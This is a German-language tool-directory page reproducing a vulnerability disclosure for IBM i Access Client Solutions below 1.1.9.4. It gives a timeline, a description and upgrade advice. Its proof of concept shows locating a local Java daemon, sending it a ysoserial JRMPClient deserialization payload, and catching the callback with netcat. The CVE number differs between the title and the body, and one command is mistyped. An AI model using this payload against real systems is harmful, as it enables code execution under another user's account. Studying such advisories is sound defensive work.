Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-45185 — IBM i Access Client Solutions < 1.1.9.4 - Remotecodeausführung durch unsichere Deserialisierung | Kitploit
Tools/GitHubGitHub/afine-com/cve-2023-45185
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubafine-com/cve-2023-45185

CVE-2023-45185

IBM i Access Client Solutions < 1.1.9.4 - Remotecodeausführung durch unsichere Deserialisierung

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-45184

IBM i Access Client Solutions < 1.1.9.4 - Remote-Code-Ausführung durch unsichere Deserialisierung.

Zeitplan

  • Schwachstelle an Hersteller gemeldet: 22.09.2023
  • Neue behobene Version 1.1.9.4 veröffentlicht: 08.12.2023
  • Öffentliche Offenlegung: 15.12.2023

Beschreibung

IBM i Access Client Solutions verwendet unsichere Deserialisierung für die Passwortspeicherung und zum Abrufen des Entschlüsselungsschlüssels für die Passwortverschlüsselung. Dies könnte von einem lokalen oder entfernten Angreifer zur Codeausführung genutzt werden.

Der lokale Server lässt sich leicht mit dem Befehl `netstat' finden:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ netstat -nltp | grep java
tcp6       0      0 :::34307                :::*                    LISTEN      3225094/java         off (0.00/0/0)

Wir können Details zu diesem lokalen Server mit dem Befehl ps bestätigen:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ ps aux | grep java
mmajchr+ 3224938  6.8  0.9 13305316 301392 pts/6 Sl+  12:30   0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094  0.3  0.2 11512420 79692 pts/6  Sl+  12:30   0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak  3238934  0.0  0.0   6464  1992 pts/12   R+   12:44   0:00 grep --color=auto java

Wir können eine Codeausführung durch den Benutzer mmajchrowicz unter Verwendung des ysoserial-Payloads aus dem Konto mkubiak erreichen:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ id
uid=1012(mkubiak) gid=1012(mkubiak) groups=1012(mkubiak),27(sudo)

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java -jar ysoserial.jar JRMPClient '127.0.0.1:9191' > jrmp.bin

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ (sleep 3; cat jrmp.bin) | nat -6 ::1 34307 

Im zweiten Terminal erhalten wir nach der Ausführung des Payloads durch den Dienst eine Verbindung:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ nc -lvnp 9191
listening on [any] 9191 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38012
JRMIK

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$

Dieses Problem wurde durch eine unsichere Deserialisierung von Netzwerkpaketen und Benutzerdaten verursacht. Dieses Problem wurde in IBM i Access Client Solutions 1.1.9.4 behoben.

Betroffene Versionen

< 1.1.9.4

Sicherheitshinweis

Aktualisieren Sie IBM i Access Client Solutions auf Version 1.1.9.4 oder neuer.

Referenzen

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45185
Tool herunterladen